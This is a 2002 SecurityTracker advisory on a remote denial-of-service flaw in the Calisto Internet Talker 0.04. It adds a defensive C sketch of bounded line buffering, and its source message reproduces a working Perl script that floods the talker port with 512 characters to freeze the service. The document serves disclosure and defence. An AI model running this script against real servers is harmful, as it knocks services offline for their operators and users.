SecurityTracker.com

Category:  Application (Generic)  >  Calisto
Vendors:  Howkins, Peter et al
Calisto Internet Talker Bug Lets Remote Users Crash the Service
SecurityTracker Alert ID:  1005700
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Nov 25 2002
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 0.04
Description:  A denial of service vulnerability was reported in the Calisto Internet talker. A remote user can cause the service to freeze.

SecurityFreaks reported that a remote user can connect to the talker service port and send 512 characters to the service to cause it to freeze. A manual restart is reportedly required.

Some demonstration exploit code is provided in the Source Message and at Packetstorm at:

http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl

Impact:  A remote user can cause the service to lock up.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.arcsite.de/hp/flibble/calisto/
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
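
For anyone maintaining a similar line-based service: the advisory attributes the freeze to a boundary error reached with 512 characters of input. The following is an added example, not Calisto's code and not part of the advisory, of a per-connection input handler that rejects an overlong line instead of overflowing its buffer or stalling on a line that never ends. The 512-byte buffer size and all names (`struct conn`, `conn_feed`) are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 512            /* assumed size; mirrors the 512 characters in the advisory */

struct conn {
    size_t len;                 /* bytes of the current partial line held in buf */
    int    discarding;          /* set while dropping the tail of an overlong line */
    int    overlong;            /* overlong lines rejected on this connection */
    char   buf[BUF_SIZE];       /* partial line; NUL-terminated only on delivery */
    char   last[BUF_SIZE];      /* last delivered line (stands in for the command handler) */
};

/* Feed n bytes read from the socket; returns the number of complete lines
 * delivered. Invariant: len <= BUF_SIZE - 1, so the NUL always fits. */
int conn_feed(struct conn *c, const char *data, size_t n)
{
    int delivered = 0;
    for (size_t i = 0; i < n; i++) {
        char ch = data[i];
        if (ch == '\n') {
            if (!c->discarding) {
                c->buf[c->len] = '\0';
                memcpy(c->last, c->buf, c->len + 1);
                delivered++;
            }
            c->len = 0;                         /* start a fresh line either way */
            c->discarding = 0;
        } else if (ch == '\r' || c->discarding) {
            continue;                           /* skip CR and the rest of a rejected line */
        } else if (c->len == BUF_SIZE - 1) {    /* no room for this byte plus the NUL */
            c->overlong++;
            c->len = 0;
            c->discarding = 1;
        } else {
            c->buf[c->len++] = ch;
        }
    }
    return delivered;
}

int main(void)
{
    struct conn c = {0};
    char flood[512];                            /* constructed input: 512 bytes, no newline */
    memset(flood, 'A', sizeof flood);
    conn_feed(&c, flood, sizeof flood);
    return (c.overlong == 1 && c.len == 0) ? 0 : 1;
}
```

A server using this pattern can also treat a non-zero `overlong` count as a signal to log the peer address or drop the connection.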


 Source Message Contents

Date:  Mon, 25 Nov 2002 00:46:51 -0500
Subject:  Calisto Internet Talker Version 0.04 Remote Denial of Service

 

http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl


#!/usr/bin/perl
 
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
 
# Calisto Internet Talker Version 0.04 Remote Denial of Service
 
 
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
 
# [ subversive[at]linuxmail.org ] - *31/10/2002*


use IO::Socket;


$data = "A";
$size = "512";
$freeze .= $data x $size;

# Parse the -h <host> and -p <port> command-line options.
while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

# No host given: print the usage text and exit.
if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   SF-talkischeap.pl by subversive - www.securityfreaks.com
   Calisto Internet Talker Version 0.04 Remote Denial of Service
  

   Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;
}

 

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;



 



Copyright 2002, SecurityGlobal.net LLC